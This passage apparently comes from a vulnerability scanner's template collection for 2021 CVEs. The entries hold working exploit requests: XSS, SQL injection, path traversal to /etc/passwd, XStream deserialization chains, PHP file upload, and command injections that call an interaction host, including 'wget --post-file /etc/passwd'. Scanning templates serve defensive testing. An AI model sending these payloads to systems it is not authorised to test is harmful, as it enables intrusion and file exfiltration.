application/x-www-form-urlencoded\n\nid=1&firstname=Administrator%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&lastname=Admin&username=admin\n","GET /admin/?page=user HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_3, 'text/html')","status_code_3 == 200","contains(body_3, \"Administrator\\\"><script>alert(document.domain)</script> Admin\")"],"condition":"and"}]}]},{"id":"CVE-2021-39152","info":{"name":"XStream <1.4.18 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<map>\n  <entry>\n    <jdk.nashorn.internal.runtime.Source_-URLData>\n      <url>http://{{interactsh-url}}/internal/</url>\n      <cs>GBK</cs>\n      <hash>1111</hash>\n      <array>b</array>\n      <length>0</length>\n      <lastModified>0</lastModified>\n    </jdk.nashorn.internal.runtime.Source_-URLData>\n    <jdk.nashorn.internal.runtime.Source_-URLData reference='../jdk.nashorn.internal.runtime.Source_-URLData'/>\n  </entry>\n  <entry>\n    <jdk.nashorn.internal.runtime.Source_-URLData>\n      <url>http://{{interactsh-url}}/internal/</url>\n      <cs reference='../../../entry/jdk.nashorn.internal.runtime.Source_-URLData/cs'/>\n      <hash>1111</hash>\n      <array>b</array>\n      <length>0</length>\n      <lastModified>0</lastModified>\n    </jdk.nashorn.internal.runtime.Source_-URLData>\n    <jdk.nashorn.internal.runtime.Source_-URLData reference='../jdk.nashorn.internal.runtime.Source_-URLData'/>\n  </entry>\n</map>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: Java"]}]}]},{"id":"CVE-2021-21351","info":{"name":"XStream <1.4.16 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<sorted-set>\n  <javax.naming.ldap.Rdn_-RdnEntry>\n    <type>ysomap</type>\n    <value class='com.sun.org.apache.xpath.internal.objects.XRTreeFrag'>\n      <m__DTMXRTreeFrag>\n        <m__dtm class='com.sun.org.apache.xml.internal.dtm.ref.sax2dtm.SAX2DTM'>\n          <m__size>-10086</m__size>\n          <m__mgrDefault>\n            <__overrideDefaultParser>false</__overrideDefaultParser>\n            <m__incremental>false</m__incremental>\n            <m__source__location>false</m__source__location>\n            <m__dtms>\n              <null/>\n            </m__dtms>\n            <m__defaultHandler/>\n          </m__mgrDefault>\n          <m__shouldStripWS>false</m__shouldStripWS>\n          <m__indexing>false</m__indexing>\n          <m__incrementalSAXSource class='com.sun.org.apache.xml.internal.dtm.ref.IncrementalSAXSource_Xerces'>\n            <fPullParserConfig class='com.sun.rowset.JdbcRowSetImpl' serialization='custom'>\n              <javax.sql.rowset.BaseRowSet>\n                <default>\n                  <concurrency>1008</concurrency>\n                  <escapeProcessing>true</escapeProcessing>\n                  <fetchDir>1000</fetchDir>\n                  <fetchSize>0</fetchSize>\n                  <isolation>2</isolation>\n                  <maxFieldSize>0</maxFieldSize>\n                  <maxRows>0</maxRows>\n                  <queryTimeout>0</queryTimeout>\n                  <readOnly>true</readOnly>\n                  <rowSetType>1004</rowSetType>\n                  <showDeleted>false</showDeleted>\n                  <dataSource>rmi://{{interactsh-url}}/test</dataSource>\n                  <listeners/>\n                  <params/>\n                </default>\n              </javax.sql.rowset.BaseRowSet>\n              <com.sun.rowset.JdbcRowSetImpl>\n                <default/>\n              </com.sun.rowset.JdbcRowSetImpl>\n            </fPullParserConfig>\n            <fConfigSetInput>\n              <class>com.sun.rowset.JdbcRowSetImpl</class>\n              <name>setAutoCommit</name>\n              <parameter-types>\n                <class>boolean</class>\n              </parameter-types>\n            </fConfigSetInput>\n            <fConfigParse reference='../fConfigSetInput'/>\n            <fParseInProgress>false</fParseInProgress>\n          </m__incrementalSAXSource>\n          <m__walker>\n            <nextIsRaw>false</nextIsRaw>\n          </m__walker>\n          <m__endDocumentOccured>false</m__endDocumentOccured>\n          <m__idAttributes/>\n          <m__textPendingStart>-1</m__textPendingStart>\n          <m__useSourceLocationProperty>false</m__useSourceLocationProperty>\n          <m__pastFirstElement>false</m__pastFirstElement>\n        </m__dtm>\n        <m__dtmIdentity>1</m__dtmIdentity>\n      </m__DTMXRTreeFrag>\n      <m__dtmRoot>1</m__dtmRoot>\n      <m__allowRelease>false</m__allowRelease>\n    </value>\n  </javax.naming.ldap.Rdn_-RdnEntry>\n  <javax.naming.ldap.Rdn_-RdnEntry>\n    <type>ysomap</type>\n    <value class='com.sun.org.apache.xpath.internal.objects.XString'>\n      <m__obj class='string'>test</m__obj>\n    </value>\n  </javax.naming.ldap.Rdn_-RdnEntry>\n</sorted-set>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["timestamp","com.thoughtworks.xstream"],"condition":"or"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2021-24750","info":{"name":"WordPress Visitor Statistics (Real Time Traffic) <4.8 -SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin-ajax.php?action=refDetails&requests=%7B%22refUrl%22:%22'%20union%20select%201,1,md5({{num}}),4--%20%22%7D HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-34805","info":{"name":"FAUST iServer 9.0.018.018.4 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24316","info":{"name":"WordPress Mediumish Theme <=1.0.47 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?post_type=post&s=%22%3E%3Cscript%3Ealert(/{{randstr}}/)%3C/script%3E "],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(/{{randstr}}/)</script>","Sorry, no posts matched your criteria."],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-44152","info":{"name":"Reprise License Manager 14.2 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/goforms/menu"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["RLM Administration Commands"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27315","info":{"name":"Doctor Appointment System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 10s\nPOST /contactus.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nfirstname={{randstr}}&lastname={{randstr}}&email={{randstr}}%40test.com&comment=test'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&submit=Send+Us\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 500","contains(body, \"Medical Management System\")"],"condition":"and"}]}]},{"id":"CVE-2021-24762","info":{"name":"WordPress Perfect Survey<1.5.2 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=get_question&question_id=1%20AND%20(SELECT%207242%20FROM%20(SELECT(SLEEP(4)))HQYx)"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=4"]},{"type":"word","part":"header","words":["wp-ps-session"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2021-24176","info":{"name":"WordPress JH 404 Logger <=1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/jh-404-logger/readme.txt"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["JH 404 Logger"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41691","info":{"name":"openSIS Student Information System 8.0 SQL Injection","severity":"high"},"requests":[{"raw":["POST /index.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nUSERNAME={{username}}&PASSWORD={{password}}&language=en&log=\n","POST /TransferredOutModal.php?modfunc=detail HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nstudent_id=updatexml(0x23,concat(1,md5({{num}})),1)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5\n"],"attack":"pitchfork","payloads":{"username":["student"],"password":["student@123"]},"req-condition":true,"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["contains(body_2, \"<!-- SQL STATEMENT:\") && contains(body_2, \"SELECT COUNT(STUDENT_ID)\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2021-21315","info":{"name":"Node.JS System Information Library <5.3.1 - Remote Command Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/getServices?name[]=$(wget%20--post-file%20/etc/passwd%20{{interactsh-url}})"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["wget --post-file /etc/passwd {{interactsh-url}}","name","running","pids"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-31537","info":{"name":"SIS Informatik REWE GO SP17 <7.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/rewe/prod/web/rewe_go_check.php?config=rewe&version=7.5.0%3cscript%3econfirm({{randstr}})%3c%2fscript%3e&win=2707"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>confirm({{randstr}})</script>","SIS-REWE"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2021-24274","info":{"name":"WordPress Supsystic Ultimate Maps <1.2.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=ultimate-maps-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["</script><script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24284","info":{"name":"WordPress Kaswara Modern VC Addons <=3.0.1 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php?action=uploadFontIcon HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=------------------------d3be34324392a708\n\n--------------------------d3be34324392a708\nContent-Disposition: form-data; name=\"fonticonzipfile\"; filename=\"{{zip_file}}.zip\"\nContent-Type: application/octet-stream\n\n{{hex_decode('504B03040A0000000000FA73F454B2333E07140000001400000006001C00')}}{{php_file}}{{hex_decode('555409000366CBD76267CBD76275780B000104F50100000414000000')}}{{php_cmd}}{{hex_decode('0A504B01021E030A00000000002978F454E49BC1591300000013000000060018000000000001000000A48100000000')}}{{php_file}}{{hex_decode('555405000366CBD76275780B000104F50100000414000000504B050600000000010001004C000000530000000000')}}\n--------------------------d3be34324392a708\nContent-Disposition: form-data; name=\"fontsetname\"\n\n{{zip_file}}\n--------------------------d3be34324392a708\nContent-Disposition: form-data; name=\"action\"\n\nuploadFontIcon\n--------------------------d3be34324392a708--\n","GET /wp-content/uploads/kaswara/fonts_icon/{{zip_file}}/{{php_file}} HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["wp-content/uploads/kaswara/fonts_icon/{{zip_file}}/style.css"]},{"type":"word","part":"body_2","words":["phpinfo()"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-44848","info":{"name":"Thinfinity VirtualUI User Enumeration","severity":"medium"},"requests":[{"raw":["GET /changePassword?username=administrator HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["\"rc\":(.*?)","\"msg\":\"(.*?)\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-45428","info":{"name":"Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["GET /{{randstr}}.txt HTTP/1.1\nHost: {{Hostname}}\n","PUT /{{randstr}}.txt HTTP/1.1\nHost: {{Hostname}}\n\nCVE-2021-45428\n","GET /{{randstr}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["status_code_1 == 404 && status_code_2 == 201","contains(body_3, \"CVE-2021-45428\") && status_code_3 == 200"],"condition":"and"}]}]},{"id":"CVE-2021-38540","info":{"name":"Apache Airflow - Unauthenticated Variable Import","severity":"critical"},"requests":[{"raw":["GET /login/ HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n","POST /variable/varimport HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryB874qcjbpxTP1Hj7\nReferer: {{RootURL}}/admin/variable/\n\n------WebKitFormBoundaryB874qcjbpxTP1Hj7\nContent-Disposition: form-data; name=\"csrf_token\"\n\n{{csrf}}\n------WebKitFormBoundaryB874qcjbpxTP1Hj7\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.json\"\nContent-Type: application/json\n\n{\n    \"type\": \"{{randstr}}\"\n}\n\n------WebKitFormBoundaryB874qcjbpxTP1Hj7--\n"],"cookie-reuse":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, \"Sign In\")","status_code_2 == 302","contains(header_2, \"session=.\")"],"condition":"and"},{"type":"word","words":["You should be redirected automatically to target URL: <a href=\"/\">"]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["type=\"hidden\" value=\"(.*?)\">"],"internal":true}]}]},{"id":"CVE-2021-24239","info":{"name":"WordPress Pie Register <3.7.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=pr_new_registration_form&show_dash_widget=1&invitaion_code=PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pOzwvc2NyaXB0Pg=="],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"<script>alert(document.domain);</script>\") && contains(body, \"invitaion-code-table\")"],"condition":"and"}]}]},{"id":"CVE-2021-25111","info":{"name":"WordPress English Admin <1.5.2 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=heartbeat&admin_custom_language_toggle=1&admin_custom_language_return_url=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-39350","info":{"name":"FV Flowplayer Video Player WordPress plugin  - Authenticated Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=fv_player_stats&player_id=1</script><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>","<h1>FV Player Stats</h1>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24875","info":{"name":"WordPress eCommerce Product Catalog <3.0.39 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?post_type=al_product&page=product-settings.php&ic-settings-search=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29%2F%2F HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"alert(document.domain)\")","contains(body_2, \"eCommerce Product Catalog\")"],"condition":"and"}]}]},{"id":"CVE-2021-24320","info":{"name":"WordPress Bello Directory & Listing Theme <1.6.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/listing/?listing_list_view=standard13%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-34370","info":{"name":"Accela Civic Platform <=21.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ssoAdapter/logoutAction.do?servProvCode=SAFVC&successURL=https://interact.sh/"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2021-27909","info":{"name":"Mautic <3.3.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/passwordreset?bundle=';alert(document.domain);var+ok='"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'';alert(document.domain);var ok='","mauticBasePath"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21745","info":{"name":"ZTE MF971R - Referer authentication bypass","severity":"medium"},"requests":[{"raw":["GET /goform/goform_get_cmd_process?cmd=psw_fail_num_str HTTP/1.1\nHost: {{Hostname}}\nReferer: http://interact.sh/127.0.0.1.html\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["psw_fail_num_str\":\"[0-9]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40973","info":{"name":"Spotweb <= 1.5.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /install.php?page=4 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsettingsform[lastname]=pdteam'+onclick='alert(document.domain)\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onclick='alert(document.domain)","Spotweb"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-33357","info":{"name":"RaspAP <=2.6.5 - Remote Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/ajax/networking/get_netcfg.php?iface=;curl%20{{interactsh-url}}/`whoami`;"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","words":["DHCPEnabled"]}],"extractors":[{"type":"regex","group":1,"regex":["GET \\/([a-z-]+) HTTP"],"part":"interactsh_request"}]}]},{"id":"CVE-2021-34643","info":{"name":"WordPress Skaut Bazar <1.3.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/options-general.php/</script><script>alert(document.domain)</script>/?page=skatubazar_option HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-46704","info":{"name":"GenieACS => 1.2.8 - OS Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/ping/;`id`"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/plain"]},{"type":"regex","part":"body","regex":["uid=([0-9]+)"]},{"type":"status","status":[500]}],"extractors":[{"type":"regex","regex":["uid=(\\d+)\\((\\w+)\\)"],"part":"body"}]}]},{"id":"CVE-2021-46417","info":{"name":"Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/tsaupload.cgi?file_name=../../../../../..//etc/passwd&password="],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-20123","info":{"name":"Draytek VigorConnect 1.6.0-B - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ACSServer/DownloadFileServlet?show_file_name=../../../../../../etc/passwd&type=uploadfile&path=anything","{{BaseURL}}/ACSServer/DownloadFileServlet?show_file_name=../../../../../../windows/win.ini&type=uploadfile&path=anything"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"regex","part":"body","regex":["root:.*:0:0:","for 16-bit app support"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24146","info":{"name":"WordPress Modern Events Calendar Lite <5.16.5 - Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=csv"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["mec-events","text/csv"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21311","info":{"name":"Adminer <4.7.9 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST {{path}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nauth[driver]=elastic&auth[server]=example.org&auth[username]={{to_lower(rand_base(8))}}&auth[password]={{to_lower(rand_base(8))}}&auth[db]={{to_lower(rand_base(8))}}\n"],"payloads":{"path":["/index.php","/adminer.php","/adminer/adminer.php","/adminer/index.php","/_adminer.php","/_adminer/index.php"]},"attack":"batteringram","stop-at-first-match":true,"cookie-reuse":true,"redirects":true,"max-redirects":1,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>400 - Bad Request</title>","&lt;title&gt;400 - Bad Request&lt;/title&gt;"],"condition":"or"},{"type":"status","status":[403]}]}]},{"id":"CVE-2021-37305","info":{"name":"Jeecg Boot <= 2.4.5 - Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/jeecg-boot/sys/user/querySysUser?username=admin"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["username\":\"admin","success\":true","result\":{"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-28150","info":{"name":"Hongdian H8922 3.0.5 - Information Disclosure","severity":"medium"},"requests":[{"raw":["GET /backup2.cgi HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic Z3Vlc3Q6Z3Vlc3Q=\n","GET /backup2.cgi HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic YWRtaW46YWRtaW4=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"word","part":"body","words":["CLI configuration saved from vty","service webadmin"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-46381","info":{"name":"D-Link DAP-1620 - Local File Inclusion","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/apply.cgi"],"body":"action=do_graph_auth&graph_code=94102&html_response_message=just_login&html_response_page=../../../../../../../../../../../../../../etc/passwd&log_pass=DummyPass&login_n=admin&login_name=DummyName&tkn=634855349&tmp_log_pass=DummyPass&tmp_log_pass_auth=DummyPass","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-20837","info":{"name":"MovableType - Remote Command Injection","severity":"critical"},"requests":[{"raw":["POST /cgi-bin/mt/mt-xmlrpc.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\n\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<methodCall>\n  <methodName>mt.handler_to_coderef</methodName>\n  <params>\n    <param>\n      <value>\n        <base64>\n          {{base64(\"`wget http://{{interactsh-url}}`\")}}\n        </base64>\n      </value>\n    </param>\n  </params>\n</methodCall>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","words":["failed loading package"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-39146","info":{"name":"XStream 1.4.18 - Arbitrary Code Execution","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<sorted-set>\n  <javax.naming.ldap.Rdn_-RdnEntry>\n    <type>test</type>\n    <value class='javax.swing.MultiUIDefaults' serialization='custom'>\n      <unserializable-parents/>\n      <hashtable>\n          <default>\n            <loadFactor>0.75</loadFactor>\n            <threshold>525</threshold>\n          </default>\n          <int>700</int>\n          <int>0</int>\n      </hashtable>\n      <javax.swing.UIDefaults>\n          <default>\n            <defaultLocale>zh_CN</defaultLocale>\n            <resourceCache/>\n          </default>\n      </javax.swing.UIDefaults>\n      <javax.swing.MultiUIDefaults>\n          <default>\n            <tables>\n            <javax.swing.UIDefaults serialization='custom'>\n              <unserializable-parents/>\n              <hashtable>\n                <default>\n                  <loadFactor>0.75</loadFactor>\n                  <threshold>525</threshold>\n                </default>\n                <int>700</int>\n                <int>1</int>\n                <string>lazyValue</string>\n                <javax.swing.UIDefaults_-ProxyLazyValue>\n                  <className>javax.naming.InitialContext</className>\n                  <methodName>doLookup</methodName>\n                  <args>\n                    <string>ldap://{{interactsh-url}}/#evil</string>\n                  </args>\n                </javax.swing.UIDefaults_-ProxyLazyValue>\n              </hashtable>\n              <javax.swing.UIDefaults>\n                <default>\n                  <defaultLocale reference='../../../../../../../javax.swing.UIDefaults/default/defaultLocale'/>\n                  <resourceCache/>\n                </default>\n              </javax.swing.UIDefaults>\n            </javax.swing.UIDefaults>\n            </tables>\n          </default>\n      </javax.swing.MultiUIDefaults>\n    </value>\n  </javax.naming.ldap.Rdn_-RdnEntry>\n  <javax.naming.ldap.Rdn_-RdnEntry>\n    <type>test</type>\n    <value class='com.sun.org.apache.xpath.internal.objects.XString'>\n      <m__obj class='string'>test</m__obj>\n    </value>\n  </javax.naming.ldap.Rdn_-RdnEntry>\n</sorted-set>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["timestamp","com.thoughtworks.xstream"],"condition":"or"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2021-27358","info":{"name":"Grafana Unauthenticated Snapshot Creation","severity":"high"},"requests":[{"raw":["POST /api/snapshots HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"dashboard\": {\"editable\":false,\"hideControls\":true,\"nav\":[{\"enable\":false,\"type\":\"timepicker\"}],\"rows\": [{}],\"style\":\"dark\",\"tags\":[],\"templating\":{\"list\":[]},\"time\":{},\"timezone\":\"browser\",\"title\":\"Home\",\"version\":5},\"expires\": 3600}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"deleteUrl\":","\"deleteKey\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]}]}]},{"id":"CVE-2021-26723","info":{"name":"Jenzabar 9.2x-9.2.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ics?tool=search&query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40972","info":{"name":"Spotweb <= 1.5.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /install.php?page=4 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsettingsform[mail]=pdteam'+onclick='alert(document.domain)\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onclick='alert(document.domain)","Spotweb"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40822","info":{"name":"Geoserver - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST /geoserver/TestWfsPost HTTP/1.1\nHost: oast.pro\nContent-Type: 